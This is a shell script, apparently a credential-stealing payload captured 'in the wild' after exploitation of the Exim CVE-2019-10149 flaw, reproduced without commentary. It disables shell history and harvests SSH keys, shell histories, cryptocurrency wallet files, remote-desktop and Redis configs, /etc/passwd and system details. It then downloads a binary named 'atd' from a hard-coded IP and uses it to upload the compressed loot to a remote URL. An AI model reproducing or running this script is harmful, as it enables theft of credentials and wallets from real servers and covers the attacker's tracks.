#!/bin/sh# found in the wild# exim exploit 2019-10149export PATH=/bin:

1. #!/bin/sh
2.  
3. # found in the wild
4. # exim exploit 2019-10149
5.  
6. export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
7. export LC_ALL=C
8. export HISTFILE=/dev/null
9. export HISTSIZE=0
10.  
11. HOME=/root
12. unset DISPLAY
13. export UPLOAD_URL=https://85.25.84.99/up.php
14.  
15. NOLS=0
16. NOETC=0
17. NODUP=1
18. V=2
19. UF=temp3754r97y$V
20.  
21. if [ $NODUP -eq 1 ]; then
22. test -f /var/tmp/$UF -o -f /tmp/$UF -o -f /dev/shm/$UF && exit 100
23. fi
24. BASE=''
25. touch /var/tmp/$UF && BASE=/var/tmp
26. test -z "$BASE" && touch /tmp/$UF && BASE=/tmp
27. test -z "$BASE" && touch /dev/shm/$UF && BASE=/dev/shm
28. test -z "$BASE" && exit 90
29. cd $BASE && mkdir r && cd r
30. export PATH=$BASE:$PATH
31.  
32. snd () { sh -c "UPLOAD_FILE=\"$1\" UPLOAD_NAME=\"$(hostname).tbz2\" UPLOAD_URL=$UPLOAD_URL atd &"; }
33.  
34. # ok, real work starts here
35. main_dir=$BASE/r
36. mkdir $main_dir/root/
37.  
38. COPY_STUFF=".ssh/ .bashrc .zshrc .*history .histfile .profile .dbshell"
39. cd $HOME && cp -a $COPY_STUFF $main_dir/root/ 2>/dev/null
40.  
41.  
42. cd $HOME && tar cf $main_dir/root/root.tar \
43. .*coin/w*dat .*Coin/w*dat .dash*/w*dat .dash*/*.conf .*coin/*.conf .*Coin/*.conf *address.txt \
44. *coin/w*dat *Coin/w*dat .vnc* .redis* .rdesk* .remmina \
45. /home/*/.*coin/w*dat /home/*/.dash*/w*dat /home/*/.dash*/*conf /home/*/.*Coin/w*dat /home/*/.*coin/*.conf /home/*/.*Coin/*.conf \
46. /home/*/.ssh /home/*/.remmina /home/*/.vnc* /home/*/.redis* /home/*/.rdesk* /home/*/.remmina \
47. /home/*/.bash* /home/*/.zsh* /home/*/.*hist* /home/*/.profile /home/*/.dbshell 2>/dev/null
48. cd $main_dir/root/
49.  
50. ssh -V > ssh.version 2>/dev/null
51.  
52. if [ $NOLS -eq 0 ]; then
53. ls -la /home/ > homes 2>/dev/null
54. ls -la /home/*/ >> homes 2>/dev/null
55. la -laR /root > rootls 2>/dev/null
56. fi
57.  
58. mkdir $main_dir/root/sysinfo 2>/dev/null
59. cd $main_dir/root/sysinfo 2>/dev/null
60.  
61. # EXIM
62. tail -n 100 /etc/*release /etc/version > system.version 2>/dev/null
63. ip addr > ip 2>/dev/null
64. iptables-save > iptables 2>/dev/null
65. ip6tables-save > ip6tables 2>/dev/null
66. # /EXIM end exim
67.  
68. hostname > hostname
69. uname -a > uname
70. echo `date -u` '('`$(which date)`')' > date
71. uptime > uptime
72. w > w
73. id > id
74.  
75. ps auxwwwwwTH > ps
76. ps auxwwwwwf > ps-forest
77. ps auxwwwwwfe > ps-env
78.  
79. cat /proc/meminfo > meminfo 2>/dev/null
80. cat /proc/cpuinfo > cpuinfo 2>/dev/null
81. ifconfig -a > ifconfig 2>/dev/null
82. df > df 2>/dev/null
83. dmesg > dmesg 2>/dev/null
84. mount > mount 2>/dev/null
85. env > env 2>/dev/null
86.  
87. lspci -k > lspci 2>/dev/null
88. lsusb > lsusb 2>/dev/null
89.  
90. netstat -antpuxwenW > netstat 2>/dev/null
91. route -en > route 2>/dev/null
92.  
93. # other kernel info
94. cat /proc/modules > lsmod 2>/dev/null
95. cp /proc/version /proc/cmdline /proc/filesystems . 2>/dev/null
96. lscpu > lscpu 2>/dev/null
97.  
98. # copy stuff from /etc?
99. if [ $NOETC -eq 0 ]; then
100. mkdir $main_dir/root/sysinfo/etc
101. cd $main_dir/root/sysinfo/etc
102. cp -pRL /etc/*release /etc/cron* /etc/*version /etc/issue* /etc/hosts* /etc/motd /etc/passwd /etc/apache2 /etc/httpd /etc/nginx /etc/resolv* /etc/wpa* . 2>/dev/null
103. cd -
104. fi
105.  
106. cd $main_dir/root
107.  
108. # list some dirs
109. if [ $NOLS -eq 0 ]; then
110. ls -laR /boot > ls-boot 2>&1
111. ls -laR /etc > ls-etc 2>&1
112. fi
113.  
114. # compress n clean up
115. cd $main_dir
116. tar -cj --exclude 'root/sysinfo/etc/httpd/modules*' --exclude 'root/sysinfo/etc/httpd/lib*' --exclude 'root/sysinfo/etc/httpd/man*' -f $BASE/rf root
117.  
118. # drop source files
119. rm -rf $main_dir &
120.  
121. # ready to send!
122. cd $BASE
123. wget -q http://173.212.214.137/se -O atd || wget -q http://173.212.214.137/icantgetit -O /dev/null
124. test `stat -c %s atd` -eq 610932 && chmod +x atd && snd rf